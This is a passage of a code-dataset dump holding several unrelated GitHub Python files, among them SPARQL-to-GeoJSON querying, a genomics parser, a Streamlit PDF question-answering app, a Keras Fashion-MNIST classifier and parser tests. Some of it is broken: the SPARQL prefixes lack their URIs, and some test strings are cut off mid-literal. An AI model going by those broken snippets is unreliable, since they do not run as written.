'strip_version:raw:optional'],\n'''signed_jars(name={name},\n dependencies={dependencies},\n strip_version={strip_version},\n)''')\n\nTarget.unpacked_jars = Target.create_template('unpacked_jars',\n ['name', 'libraries:list', 'include_patterns:list', 'exclude_patterns:list'],\n'''unpacked_jars(name={name},\n libraries = {libraries},\n include_patterns = {include_patterns},\n exclude_patterns = {exclude_patterns},\n)''')\n\nTarget.jar = Target.create_template('jar',\n ['org:string', 'name:string', 'rev:string', 'force:raw:optional', 'excludes:list:optional',\n 'mutable:raw:optional', 'artifacts:list:optional', 'ext:string:optional',\n 'url:string:optional', 'classifier:string:optional', 'apidocs:string:optional',\n 'type_:string:optional', 'intransitive:raw:optional',],\n'''sjar(org={org}, name={name}, rev={rev}, force={force}, mutable={mutable}, ext={ext}, \\\nclassifier={classifier}, ext={type_}, intransitive={intransitive},\n url={url},\n apidocs={apidocs},\n artifacts={artifacts},\n excludes={excludes},)\n'''.strip(), blank_lines=False)\n\nTarget.sjar = 
Target.create_template('sjar',\n  ['org:string', 'name:string', 'rev:string', 'force:raw:optional', 'excludes:list:optional',\n   'mutable:raw:optional', 'artifacts:list:optional', 'ext:string:optional',\n   'url:string:optional', 'classifier:string:optional', 'apidocs:string:optional',\n   'type_:string:optional', 'intransitive:raw:optional',],\n'''sjar(org={org}, name={name}, rev={rev}, mutable={mutable}, ext={ext}, \\\nclassifier={classifier}, ext={type_}, intransitive={intransitive},\n  url={url},\n  force={force},\n  apidocs={apidocs},\n  artifacts={artifacts},\n  excludes={excludes},)\n'''.strip(), blank_lines=False)\n\nTarget.wire_proto_path = Target.create_template('wire_proto_path',\n  ['name', 'sources', 'dependencies'], dedent('''\n    wire_proto_path(name={name},\n      sources={sources},\n      dependencies={dependencies},\n    )\n    ''').strip())\n","repo_name":"ericzundel/mvn2pants","sub_path":"src/python/squarepants/target_template.py","file_name":"target_template.py","file_ext":"py","file_size_in_byte":16909,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"61"} +{"seq_id":"37345936018","text":"#Write a program that takes the coordinates of two points as input\r\n#and finds the distance between them in 2D space.\r\n#AB = sqrt((xb - xa)^2 + (yb - ya)^2)\r\ndef inputCoordinate(x):\r\n    xy = [\"X\", \"Y\"]\r\n    a = []\r\n    for i in range(x):\r\n        number = int(input(f\"Enter the {xy[i]} coordinate: \"))\r\n        a.append(number)\r\n    return a\r\nprint(\"Enter the coordinates of point A\")\r\ndotaA = inputCoordinate(2)\r\nprint(\"Enter the coordinates of point B\")\r\ndotaB = inputCoordinate(2)\r\nlength = ((dotaB[0] - dotaA[0]) ** 2 + (dotaB[1] - dotaA[1]) ** 2) ** (0.5)\r\nprint(f\"Segment length: {length}\")","repo_name":"lvrach23/Home_work_lesson_1","sub_path":"Home_work_task_5.py","file_name":"Home_work_task_5.py","file_ext":"py","file_size_in_byte":745,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"23908909956","text":"import geojson\r\nimport json\r\nimport shapely.wkt\r\nfrom SPARQLWrapper import SPARQLWrapper, JSON\r\nfrom .config import STRABON_SPARQL_ENDPOINT\r\nimport pandas as pd\r\n\r\n\r\ndef query_sparql_endpoint(sparql_query: str):\r\n    \"\"\"query sparql endpoint\"\"\"\r\n\r\n    sparql = SPARQLWrapper(STRABON_SPARQL_ENDPOINT)\r\n    sparql.setQuery(sparql_query)\r\n    sparql.setReturnFormat(JSON)\r\n    results = sparql.queryAndConvert()\r\n\r\n    return results\r\n\r\n\r\ndef convert_query_output_to_geojson(results: dict):\r\n    \"\"\"convert query results about cams observations to geojson\"\"\"\r\n\r\n    try:\r\n        # Execute the query and get the results\r\n        features = []\r\n        for r in results[\"results\"][\"bindings\"]:\r\n            geom_wkt = r[\"foi_geom\"][\"value\"]\r\n            obs_time = r[\"obs_time\"][\"value\"]\r\n            obs_result = r[\"obs_result\"][\"value\"]\r\n\r\n            geom = shapely.wkt.loads(geom_wkt)\r\n            feature = geojson.Feature(geometry=geom, properties={\"observation_time\": obs_time, \"observation_result\": obs_result})\r\n            features.append(feature)\r\n\r\n        feature_collection = {\"type\": \"FeatureCollection\", \"features\": features}\r\n        \r\n        return feature_collection\r\n\r\n    except Exception as e:\r\n        print(f\"An error occurred: {e}\")\r\n        return None\r\n\r\n\r\ndef json_to_dataframe(data):\r\n    \"\"\"This function converts the results of a sparql query to a dataframe\"\"\"\r\n\r\n    # Check if the \"bindings\" key exists in the JSON\r\n    if \"results\" in data and \"bindings\" in data[\"results\"]:\r\n        # Extract the \"bindings\" part from the JSON\r\n        bindings = 
data[\"results\"][\"bindings\"]\r\n # Create an empty list to store the data in a structured format\r\n formatted_data = []\r\n\r\n for entry in bindings:\r\n # Create a dictionary to store the data for each entry\r\n entry_data = {}\r\n \r\n # Iterate through the entry's fields\r\n for field_name, field_data in entry.items():\r\n entry_data[field_name] = field_data.get(\"value\")\r\n\r\n formatted_data.append(entry_data)\r\n\r\n # Create a pandas DataFrame from the formatted data\r\n df = pd.DataFrame(formatted_data)\r\n #df.drop_duplicates(inplace=True)\r\n return df\r\n else:\r\n print(\"Invalid JSON format. Unable to convert to DataFrame.\")\r\n return None\r\n\r\n\r\nif __name__ == \"__main__\":\r\n\r\n query = \"\"\"\r\n PREFIX sosa: \r\n PREFIX geo: \r\n PREFIX geof: \r\n PREFIX gadm: \r\n PREFIX rdfs: \r\n\r\n SELECT ?obs_time ?obs_result ?foi_geom\r\n WHERE {\r\n {\r\n SELECT ?foi_ent ?gadm_name\r\n WHERE {\r\n ?foi_ent a sosa:FeatureOfInterest ;\r\n geo:intersects ?gadm_ent .\r\n ?gadm_ent a gadm:AdministrativeUnit ;\r\n gadm:hasName 'Geltendorf' ;\r\n } \r\n }\r\n\r\n ?obs_ent a sosa:Observation ;\r\n sosa:hasSimpleResult ?obs_result ; \r\n sosa:resultTime ?obs_time ;\r\n sosa:hasFeatureOfInterest ?foi_ent ;\r\n sosa:observedProperty ?obs_prop_ent .\r\n ?obs_prop_ent a sosa:ObservableProperty ;\r\n rdfs:label 'PM10' .\r\n ?foi_ent geo:hasGeometry ?foi_geom_ent .\r\n ?foi_geom_ent geo:asWKT ?foi_geom .\r\n\r\n\r\n FILTER (YEAR(?obs_time) = 2020 && MONTH(?obs_time) = 1)\r\n FILTER (?obs_result > 40)\r\n }\r\n \"\"\"\r\n\r\n # query strabon endpoint\r\n results = query_sparql_endpoint(query)\r\n\r\n # create geojson if possible\r\n cams_data_geojson = convert_query_output_to_geojson(results)\r\n\r\n # print geojson\r\n print(cams_data_geojson)\r\n\r\n\r\n\r\n \r\n","repo_name":"terranea/AQQA","sub_path":"components/aq_kg_query/strabon_query_data.py","file_name":"strabon_query_data.py","file_ext":"py","file_size_in_byte":3821,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"30754927673","text":"import os\nfrom os.path import lexists\n\nclass MoveFileCommand(object):\n \n def __init__(self,src,dest):\n self.src = src\n self.dest = dest\n \n def execute(self):\n self.rename(self.src,self.dest)\n \n def undo(self):\n self.rename(self.dest,self.src)\n \n def rename(self,src,dest):\n print(\"rename {} to {}\".format(src,dest))\n os.rename(src,dest)\n \ndef main():\n command_stack = []\n \n command_stack.append(MoveFileCommand('foo.txt','bar.txt'))\n command_stack.append(MoveFileCommand('bar.txt','baz.txt'))\n \n assert(not lexists(\"foo.txt\"))\n assert(not lexists(\"bar.txt\"))\n assert(not lexists(\"baz.txt\"))\n try:\n with open(\"foo.txt\",\"w\"):\n pass\n for cmd in command_stack:\n cmd.execute()\n \n for cmd in reversed(command_stack):\n cmd.undo()\n finally:\n os.unlink(\"foo.txt\")\n\nif __name__ == '__main__':\n main()","repo_name":"yk0817/design_pattern_study","sub_path":"design_pattern_code/command2.py","file_name":"command2.py","file_ext":"py","file_size_in_byte":960,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"32051811584","text":"#!/usr/bin/env python\n\nimport sys\nimport os\nfrom shutil import copyfile\nfrom os.path import dirname\nimport h5py\nimport numpy as np\nimport matplotlib.pyplot as plt\n\ndef make_directory(path):\n \"\"\"Short summary.\n\n Parameters\n ----------\n path : Full path to the directory\n\n \"\"\"\n\n if not 
os.path.isdir(path):\n os.mkdir(path)\n print(\"Making directory: \" + path)\n else:\n print(\"Directory already exists!\")\n\ndef get_parent(filepath):\n return dirname(filepath)\n\n\ndef load_data(file_path, reverse_compliment=False):\n # load dataset\n\n dataset = h5py.File(file_path, 'r')\n X_train = np.array(dataset['x_train']).astype(np.float32)\n Y_train = np.array(dataset['y_train']).astype(np.float32)\n X_valid = np.array(dataset['x_valid']).astype(np.float32)\n Y_valid = np.array(dataset['y_valid']).astype(np.float32)\n X_test = np.array(dataset['x_test']).astype(np.float32)\n Y_test = np.array(dataset['y_test']).astype(np.float32)\n X_train = X_train.transpose(0,2,1)\n X_valid = X_valid.transpose(0,2,1)\n X_test = X_test.transpose(0,2,1)\n if reverse_compliment:\n X_train_rc = X_train[:,::-1,:][:,:,::-1]\n X_valid_rc = X_valid[:,::-1,:][:,:,::-1]\n X_test_rc = X_test[:,::-1,:][:,:,::-1]\n\n X_train = np.vstack([X_train, X_train_rc])\n X_valid = np.vstack([X_valid, X_valid_rc])\n X_test = np.vstack([X_test, X_test_rc])\n\n Y_train = np.vstack([Y_train, Y_train])\n Y_valid = np.vstack([Y_valid, Y_valid])\n Y_test = np.vstack([Y_test, Y_test])\n print(\"Training set sizes: \", X_train.shape)\n return X_train, Y_train, X_valid, Y_valid, X_test, Y_test\n\ndef plot_training(history, keyword, outdir):\n fig, ax = plt.subplots()\n ax.plot(history.history[keyword])\n ax.plot(history.history['val_{}'.format(keyword)])\n ax.set_title('model {}'.format(keyword.upper()))\n ax.set_ylabel(keyword)\n ax.set_xlabel('epoch')\n ax.legend(['train', 'test'], loc='upper left')\n fig.savefig(os.path.join(outdir, '{}.pdf'.format(keyword)))\n","repo_name":"shtoneyan/codebase","sub_path":"src/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":2061,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"70116970116","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Tue Aug 2 10:27:02 2016\r\n\r\n@author: KatieM\r\n\"\"\"\r\n#function takes a folder of ASCII table text files,\r\n#and makes a graph from the files in the folder\r\n#using the given y limits. \r\ndef graphfiles2(folder, yn, ym):\r\n import numpy as np\r\n import datetime as dt\r\n import matplotlib.pyplot as plt\r\n import glob\r\n folder = glob.glob(folder)\r\n#opens the first file in the folder, reads it, and puts it's text in a list.\r\n f = open(folder[0], 'r')\r\n d = f.readlines()\r\n f.close()\r\n#creates a list \"file\" that contains the data of the file\r\n file = []\r\n for each in d[5:len(d)]:\r\n each = each[0:len(each) - 1]\r\n file = file + each.split(\", \")\r\n#creates a list \"labels\" which contains the labels for all the variables. \r\n labels = d[2].split(\", \")\r\n#finds the integer \"varl\" which is the number of variables in the graph.\r\n leng = d[5].split(\", \")\r\n varl = len(leng)\r\n#constructs a list of of the values in the first file, \r\n#seperated by the type of value (ex: [[xvalues], [y1values], [y2values]]) \r\n values = []\r\n for i in range(0,varl):\r\n values = values + [[]]\r\n values[0] = values[0] + file[0:len(file) - (varl - 1):varl]\r\n for i in range(1,len(values)):\r\n values[i] = values[i] + file[i:len(file) - (varl - i - 1):varl]\r\n\r\n#puts the values in all the other files into the list \"values\",\r\n#each in the correct list. 
\r\n for each in folder[0:len(folder) + 1]:\r\n f = open(each, 'r')\r\n data = f.readlines()\r\n f.close()\r\n \r\n file = []\r\n for each in data[5:len(data)]:\r\n each = each[0:len(each) - 1]\r\n file = file + each.split(\", \")\r\n values[0] = values[0] + file[0:len(file) - (varl - 1):varl]\r\n for i in range(1,len(values)):\r\n values[i] = values[i] + file[i:len(file) - (varl - i - 1):varl]\r\n \r\n\r\n \r\n \r\n \r\n#changes the x values to a number of seconds. \r\n import calendar\r\n vall = []\r\n for i in range(0, len(values[0])):\r\n val = [int(values[0][i][0:4]), \r\n int(values[0][i][5:7]), \r\n int(values[0][i][8:10]), \r\n int(values[0][i][11:13]), \r\n int(values[0][i][14:16]), \r\n int(values[0][i][17:19])]\r\n vall = vall + [val]\r\n values[0][i] = calendar.timegm(val)\r\n im = values[0].index(min(values[0]))\r\n yr1 = vall[im][0]\r\n mn1 = vall[im][1]\r\n dy1 = vall[im][2]\r\n hr1 = vall[im][3]\r\n mi1 = vall[im][4]\r\n sc1 = vall[im][5]\r\n s = min(values[0])\r\n b = max(values[0]) - s\r\n#labels the x axis based on the range of x values \r\n if b > 63115200:\r\n b = 31557600\r\n c = \"Time(years)\"\r\n elif b > 172800:\r\n b = 86400\r\n c = \"Time(days)\"\r\n elif b > 7200:\r\n b = 3600\r\n c = \"Time(hours)\"\r\n elif b > 120:\r\n b = 60\r\n c = \"Time(minutes)\"\r\n else:\r\n b = 1\r\n c = \"Time(seconds)\" \r\n \r\n for i in range(0, len(values[0])):\r\n values[0][i] = (values[0][i] - s) / b\r\n#labels the x axis based on the range of x values and start time. \r\n xl =c + \". Start time: \" + \"{}/{}/{}, {}:{}:{}\".format(str(yr1), str(mn1), str(dy1), str(hr1), str(mi1), str(sc1)) \r\n plt.xlabel(xl)\r\n\r\n#makes sure that if all the y variables have the same units,\r\n#that the y axis is labeled instead of having a legend.\r\n if len(labels) == 1 and varl != 1:\r\n plt.ylabel(labels[0])\r\n for i in range(1,len(values)):\r\n plt.plot(values[0], values[i])\r\n else:\r\n#plots the plot, with the labels of all the y variables in a legend.\r\n for i in range(1,len(values)):\r\n plt.plot(values[0], values[i], label=labels[i])\r\n plt.legend(bbox_to_anchor=(1.05, 1), loc=2, borderaxespad=0.)\r\n \r\n#sets the graph to have the given y limits.\r\n plt.ylim(yn, ym)\r\n#gives the graph the title specified in the files\r\n T = d[1][9:len(d[1]) - 1]\r\n plt.title(T)\r\n#shows the graph.\r\n plt.show() \r\n \r\n\r\n \r\ngraphfiles2(\"C:/Users/KatieM/Desktop/Graphs2/*\", -5, 5)\r\n","repo_name":"awbrenem/online_file_query","sub_path":"Graphfromfolder2-a.py","file_name":"Graphfromfolder2-a.py","file_ext":"py","file_size_in_byte":4103,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"6500822436","text":"import tensorflow as tf\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport os\n\nos.environ[\"CUDA_VISIBLE_DEVICES\"] = \"0\"\nphysical_devices = tf.config.list_physical_devices('GPU')\ntf.config.experimental.set_memory_growth(physical_devices[0], True)\n\n# load datasets\nfashion_mnist = tf.keras.datasets.fashion_mnist\n(Xtrain, Ytrain), (Xtest, Ytest) = fashion_mnist.load_data()\n\n# Ground Truth class names(category = 10)\nclass_names = [\"T-shirt/top\", \"Trouser\", \"Pullover\", \"Dress\", \"Coat\", \"Sandal\", \"Shirt\", \"Sneaker\", \"Bag\", \"Ankle boot\"]\n\n# split validation data, and normalization [0, 1]\nXvalid, Xtrain = Xtrain[:5000] / 255.0, Xtrain[5000:] / 255.0\nYvalid, Ytrain = Ytrain[:5000], Ytrain[5000:]\n\n# use Sequential to create the model\nmodel = 
tf.keras.models.Sequential()\nmodel.add(tf.keras.layers.Flatten(input_shape=[28, 28]))  # Convert data into 1D array\nmodel.add(tf.keras.layers.Dense(300, activation=tf.nn.relu))\nmodel.add(tf.keras.layers.Dense(100, activation=tf.nn.relu))\nmodel.add(tf.keras.layers.Dense(len(class_names), activation=tf.nn.softmax))\n# model.summary()\n\n# tf.keras.utils.plot_model(model) install failed.\n\n# model layer list\nlayer_list = model.layers\n# print(f'Input Layer: {layer_list[0]}, Layer Name: {layer_list[0].name}')\n# print(f'Hidden Layer1: {layer_list[1]}, Layer Name: {layer_list[1].name}')\n# print(f'Hidden Layer2: {layer_list[2]}, Layer Name: {layer_list[2].name}')\n# print(f'Output Layer: {layer_list[3]}, Layer Name: {layer_list[3].name}')\n\n# get the weight, bias of each layer\nw1, b1 = layer_list[1].get_weights()\n# print(f'weight shape: {w1.shape}, bias shape: {b1.shape}')\n# Connection weight matrices are mentioned in ch11; for more detail see https://keras.io/initializers/\n\n# compile model\n# With one-hot encoded labels this must change to categorical_crossentropy; otherwise use sparse_categorical_crossentropy\nmodel.compile(\n    loss=\"sparse_categorical_crossentropy\",\n    optimizer='sgd',\n    metrics=['accuracy']\n)\n\n# train & evaluate model\nhistory = model.fit(Xtrain, Ytrain, epochs=30, batch_size=1000, validation_data=(Xvalid, Yvalid))\n# parameters:\n# class_weight: sets class weights (when the data is imbalanced, give the rare classes large weights and the common ones low weights)\n# sample_weight: sets per-instance weights (e.g. if some instances are labeled by experts and others by other people, give the former higher weights)\n# if both of these parameters are provided, Keras multiplies them together\n\nscore = model.evaluate(Xtest, Ytest)\nprint(f'loss: {score[0]}, accuracy: {score[1]}')\n\n# draw image\n# pd.DataFrame(history.history).plot(figsize=(8, 5))\n# plt.grid(True)\n# plt.gca().set_ylim(0, 1) # set the Y axis between 0 and 1\n# plt.show()\n\n# predict\nXnew = Xtest[:3]\nYProbability = model.predict(Xnew)\nprint(f'Probability: {YProbability}')\nprint(f'Predict Class: ', np.where((YProbability > 0.5).astype(int) == 1)[1])\n\n","repo_name":"Sapphire0912/Programming","sub_path":"Python/Practice/DeepLearning/tensorflow_use2/CH10 ANN introduce/tf_mnist_classifier.py","file_name":"tf_mnist_classifier.py","file_ext":"py","file_size_in_byte":2836,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"74026134915","text":"import os\nimport shutil\n\nimport unittest\nimport json\n\nfrom fdz import fdz\nfrom fdz.note_parser import parse_string\n\nSAMPLE_NOTES = \"tests/sample_notes\"\n\nclass TestFileActions(unittest.TestCase):\n    \"\"\"Tests for `fdz.fileactions` functions.\"\"\"\n\n    def test_parse_comment(self):\n        \"\"\"Test Directory Initialization.\"\"\"\n        comment_string = 'testing'\n        parse_comment = parse_string(comment_string)\n        self.assertEqual(parse_comment, [{'section':'title', 'text':['testing']}])\n\n    def test_multiline_string(self):\n        uncommented_string = '''hello my \nhello'''\n        parse_uncommented = parse_string(uncommented_string)\n        self.assertEqual(parse_uncommented, [{'section':'title', 'text':['hello my '''\n        parse_double=parse_string(double_comment_string)\n        self.assertEqual(parse_double, [])\n\n        text_comment=\"hello\"\n        parse_text_comment=parse_string(text_comment)\n        print(parse_text_comment)\n        self.assertEqual(parse_text_comment, [])\n        text_comment_text=\"hellohello\"\n        parse_text_comment_text=parse_string(text_comment_text)\n        self.assertEqual(parse_text_comment_text, [{'section':'title','text':['hello']}])\n\n    def test_parse_delimiter(self):\n        delim_string=''' hello'''\n        delim_parse = parse_string(delim_string)\n        expected = [{'section':'title','delimiter':',','text':['hello']}]\n        
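# the parser should surface the delimiter alongside the parsed section text\n        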
self.assertEqual(delim_parse,expected)\n\n def test_strip_headers(self):\n header_string=''' ### hello '''\n header_parse=parse_string(header_string)\n expected = [{'section':'title', 'text':['hello']}]\n self.assertEqual(header_parse, expected)\n\n def test_full_note(self):\n full_note=None\n parsed_note_sample=None\n with open(f'{SAMPLE_NOTES}/zettl_1.md', 'r') as f:\n full_note = f.read()\n with open(f'{SAMPLE_NOTES}/zettl_1_parse.json', 'r') as fj:\n parsed_note_sample = json.load(fj)\n full_note_parse = parse_string(full_note)\n print(full_note_parse)\n self.assertEqual(full_note_parse, parsed_note_sample)\n\n","repo_name":"biniona/FDZ","sub_path":"tests/test_parser.py","file_name":"test_parser.py","file_ext":"py","file_size_in_byte":2453,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"28047948271","text":"import os\nimport pandas as pd\nimport numpy as np\nfrom ckg.graphdb_builder import builder_utils\n\ndef parser(projectId):\n data = {}\n config = builder_utils.get_config(config_name=\"wes.yml\", data_type='experiments')\n directory = '../../../data/experiments/PROJECTID/wes/'\n if 'directory' in config:\n directory = config['directory']\n directory = directory.replace('PROJECTID', projectId)\n wes_data = parseWESDataset(projectId, config, directory)\n if wes_data is not None:\n somatic_mutations = pd.DataFrame()\n for sample in wes_data:\n entities, variantRows, sampleRows, geneRows, chrRows = extractWESRelationships(wes_data[sample], config)\n data[('somatic_mutation_known_variant', 'w')] = variantRows\n data[('somatic_mutation_sample', 'w')] = sampleRows\n data[('somatic_mutation_gene', 'w')] = geneRows\n data[('somatic_mutation_chromosome', 'w')] = chrRows\n if somatic_mutations.empty:\n somatic_mutations = entities\n else:\n new = set(entities.index).difference(set(somatic_mutations.index))\n somatic_mutations = somatic_mutations.append(entities.loc[new,:], ignore_index=False)\n somatic_mutations = somatic_mutations.reset_index()\n data[('somatic_mutation', 'w')] = somatic_mutations\n\n return data\n\ndef parseWESDataset(projectId, configuration, dataDir):\n datasets = {}\n files = builder_utils.listDirectoryFiles(dataDir)\n for dfile in files:\n filepath = os.path.join(dataDir, dfile)\n if os.path.isfile(filepath):\n sample, data = loadWESDataset(filepath, configuration)\n datasets[sample] = data\n\n return datasets\n\ndef loadWESDataset(uri, configuration):\n ''' This function gets the molecular data from a Whole Exome Sequencing experiment.\n Input: uri of the processed file resulting from the WES analysis pipeline. 
The resulting\n Annovar annotated VCF file from Mutect (sampleID_mutect_annovar.vcf)\n Output: pandas DataFrame with the columns and filters defined in config.py '''\n aux = uri.split(\"/\")[-1].split(\"_\")\n sample = aux[0]\n #Get the columns from config\n columns = configuration[\"columns\"]\n #Read the data from file\n data = builder_utils.readDataset(uri)\n if configuration['filter'] in data.columns:\n data = data.loc[data[configuration['filter']], :]\n data = data[columns]\n data[\"sample\"] = aux[0]\n data[\"variant_calling_method\"] = aux[1]\n data[\"annotated_with\"] = aux[2].split('.')[0]\n data[\"alternative_names\"] = data[configuration[\"alt_names\"]]\n data = data.drop(configuration[\"alt_names\"], axis = 1)\n data = data.iloc[1:]\n data = data.replace('.', np.nan)\n data[\"ID\"] = data[configuration[\"id_fields\"]].apply(lambda x: str(x[0])+\":g.\"+str(x[1])+str(x[2])+'>'+str(x[3]), axis=1)\n data.columns = configuration['new_columns']\n return sample, data\n\ndef extractWESRelationships(data, configuration):\n entityAux = data.copy()\n entityAux = entityAux.set_index(\"ID\")\n\n variantAux = data.copy()\n variantAux = variantAux.rename(index=str, columns={\"ID\": \"START_ID\"})\n variantAux[\"END_ID\"] = variantAux[\"START_ID\"]\n variantAux = variantAux[[\"START_ID\", \"END_ID\"]]\n variantAux[\"TYPE\"] = \"IS_KNOWN_VARIANT\"\n variantAux = variantAux.drop_duplicates()\n variantAux = variantAux.dropna(how=\"any\")\n variantAux = variantAux[[\"START_ID\", \"END_ID\", \"TYPE\"]]\n\n sampleAux = data.copy()\n sampleAux = sampleAux.rename(index=str, columns={\"ID\": \"END_ID\", \"sample\": \"START_ID\"})\n sampleAux[\"TYPE\"] = \"HAS_MUTATION\"\n sampleAux = sampleAux[[\"START_ID\", \"END_ID\", \"TYPE\"]]\n\n geneAux = data.copy()\n geneAux = geneAux.rename(index=str, columns={\"ID\": \"START_ID\", \"gene\": \"END_ID\"})\n geneAux[\"TYPE\"] = \"VARIANT_FOUND_IN_GENE\"\n geneAux = geneAux[[\"START_ID\", \"END_ID\", \"TYPE\"]]\n s = geneAux[\"END_ID\"].str.split(';').apply(pd.Series, 1).stack().reset_index(level=1, drop=True)\n del geneAux[\"END_ID\"]\n aux = s.to_frame(\"END_ID\")\n geneAux = geneAux.join(aux)\n\n chrAux = data.copy()\n chrAux = chrAux.rename(index=str, columns={\"ID\": \"START_ID\", \"chr\": \"END_ID\"})\n chrAux[\"END_ID\"] = chrAux[\"END_ID\"].str.replace(\"chr\",'')\n chrAux[\"TYPE\"] = \"VARIANT_FOUND_IN_CHROMOSOME\"\n chrAux = chrAux[[\"START_ID\", \"END_ID\", \"TYPE\"]]\n\n return entityAux, variantAux, sampleAux, geneAux, chrAux\n","repo_name":"MannLabs/CKG","sub_path":"ckg/graphdb_builder/experiments/parsers/wesParser.py","file_name":"wesParser.py","file_ext":"py","file_size_in_byte":4445,"program_lang":"python","lang":"en","doc_type":"code","stars":360,"dataset":"github-code","pt":"61"} +{"seq_id":"36435887504","text":"import streamlit as st\nfrom PyPDF2 import PdfReader\nfrom langchain.text_splitter import CharacterTextSplitter\nfrom langchain.embeddings import HuggingFaceInstructEmbeddings\nfrom langchain.vectorstores import FAISS\nfrom langchain.chains.question_answering import load_qa_chain\nfrom langchain.llms import GPT4All\nimport ai_path as pa\ndef main():\n st.set_page_config(page_title=\"ask pdf\")\n st.header(\"Ask anything about your pdf\")\n\n pdf = st.file_uploader(\"Upload PDF\", type=\"pdf\")\n\n if pdf is not None:\n pdf_reader = PdfReader(pdf)\n text = \"\"\n for page in pdf_reader.pages:\n text += page.extract_text()\n\n text_splitter = CharacterTextSplitter(\n separator= \"\\n\",\n chunk_size=1000,\n chunk_overlap=200,\n 
length_function=len,\n )\n chunks = text_splitter.split_text(text)\n \n instruct_embeddings = HuggingFaceInstructEmbeddings(\n model_name=\"hkunlp/instructor-large\",\n #change to gpu or cpu based on FAISS using cpu or gpu\n # model_kwargs={\"device\":\"cuda\"}\n model_kwargs={\"device\":\"cpu\"}\n ) \n\n knowledge_base = FAISS.from_texts(chunks,instruct_embeddings)\n\n user_question = st.text_input(\"Ask a question about the contents of your pdf\")\n llm = GPT4All(\n model = pa.MODEL_PATH,\n max_tokens=2048,\n )\n\n if user_question:\n documents = knowledge_base.similarity_search(user_question)\n chain = load_qa_chain(llm=llm,chain_type=\"stuff\")\n response = chain.run(input_documents=documents, question=user_question)\n st.write(response)\n\nif __name__ == \"__main__\":\n main()","repo_name":"JuanP0411/LangChain-PDF-Reader","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1739,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"8547627164","text":"import copy\nfrom pathlib import Path\nfrom typing import Any, Callable, Dict, List, Optional, Sequence, Union\n\nimport numpy as np\nimport pandas as pd\nimport pyqtgraph as pg\nfrom pyqtgraph.Qt import QtCore\nfrom qtextras import OptionsDict, fns\nfrom qtextras.typeoverloads import FilePath\n\nfrom .templatemgr import IOTemplateManager\nfrom .yamlparser import YamlParser\nfrom ..constants import REQD_TBL_FIELDS as RTF\nfrom ..generalutils import getMaybeReplaceKey\nfrom ..parameditors.tablefilter import TableFilterEditor\nfrom ..structures import OptionsDictGroup\n\n\ndef getFieldAliases(field: OptionsDict):\n \"\"\"\n Returns the set of all potential aliases to a given field\n \"\"\"\n return set([field.name] + field.opts.get(\"aliases\", []))\n\n\ndef aliasesToRequired(field: OptionsDict):\n \"\"\"\n Returns true or false depending on whether this field shares aliases with required\n fields. This is useful when an alternative (incoming) representation of e.g. Vertices\n must be suppressed on import, but still used on export\n \"\"\"\n requiredAliases = set()\n for reqdField in RTF:\n requiredAliases.update(getFieldAliases(reqdField))\n srcAliases = getFieldAliases(field)\n return srcAliases & requiredAliases\n\n\nclass TableData(QtCore.QObject):\n sigConfigUpdated = QtCore.Signal(object)\n \"\"\"dict (self.config) during update\"\"\"\n filter: Optional[TableFilterEditor]\n\n ioTemplate = \"s3a\"\n\n def __init__(\n self,\n configPath: FilePath = None,\n configDict: dict = None,\n template: Union[FilePath, dict] = None,\n makeFilter=False,\n ):\n super().__init__()\n if template is None:\n template = self.ioTemplate\n if isinstance(template, str):\n template = IOTemplateManager.getTableConfig(template)\n self.template = template\n\n self.factories: Dict[OptionsDict, Callable[[], Any]] = {}\n\n if makeFilter:\n self.filter = TableFilterEditor()\n else:\n self.filter = None\n self.parameterParser: Optional[YamlParser] = None\n\n self.configPath: Optional[Path] = None\n self.config: Optional[dict] = {}\n\n self.allFields: List[OptionsDict] = []\n self.resetLists()\n\n configPath = configPath or None\n self.loadConfig(configPath, configDict, force=True)\n\n def makeComponentDf(self, rows=1, sequentialIds=False) -> pd.DataFrame:\n \"\"\"\n Creates a dataframe for the requested number of components. 
This is the\n        recommended method for component instantiation prior to table insertion.\n        \"\"\"\n        df_list = []\n        dropRow = False\n        if rows <= 0:\n            # Create one row and drop it, which ensures data types are correct in the\n            # empty dataframe\n            rows = 1\n            dropRow = True\n        populators = []\n        for f in self.allFields:\n            if f in self.factories:\n                val = self.factories[f]()\n            else:\n                val = f.value\n            populators.append(val)\n\n        for _ in range(rows):\n            # Make sure to construct a separate component instance for\n            # each row so no objects share the same reference\n            df_list.append(copy.copy(populators))\n        outDf = pd.DataFrame(df_list, columns=self.allFields)\n        if RTF.ID in self.allFields:\n            if sequentialIds:\n                outDf[RTF.ID] = np.arange(len(outDf), dtype=int)\n            outDf = outDf.set_index(RTF.ID, drop=False)\n        if dropRow:\n            outDf = outDf.iloc[0:0]\n        return outDf\n\n    def addFieldFactory(self, fieldLabel: OptionsDict, factory: Callable[[], Any]):\n        \"\"\"\n        For fields that are simple functions (i.e. don't require input from the user),\n        a factory can be used to create default values when instantiating new table rows.\n\n        Parameters\n        ----------\n        fieldLabel\n            Which field this factory is used for instead of just the default value\n        factory\n            Callable to use instead of field value. This is called with no parameters.\n        \"\"\"\n        self.factories[fieldLabel] = factory\n\n    def addField(self, field: OptionsDict):\n        \"\"\"\n        Adds a new field to the table. If the field already exists in the current\n        table, no action is performed. Returns *True* if a field really was added,\n        *False* if this field is already in the table list or aliases to an existing\n        field\n        \"\"\"\n\n        # Problems occur when fields alias to already existing ones. When this is the\n        # case, ignore the extra fields. Not only does this solve the many-to-one alias\n        # issue, but also allows table datas with different required fields to\n        # seamlessly share and swap fields with each other while 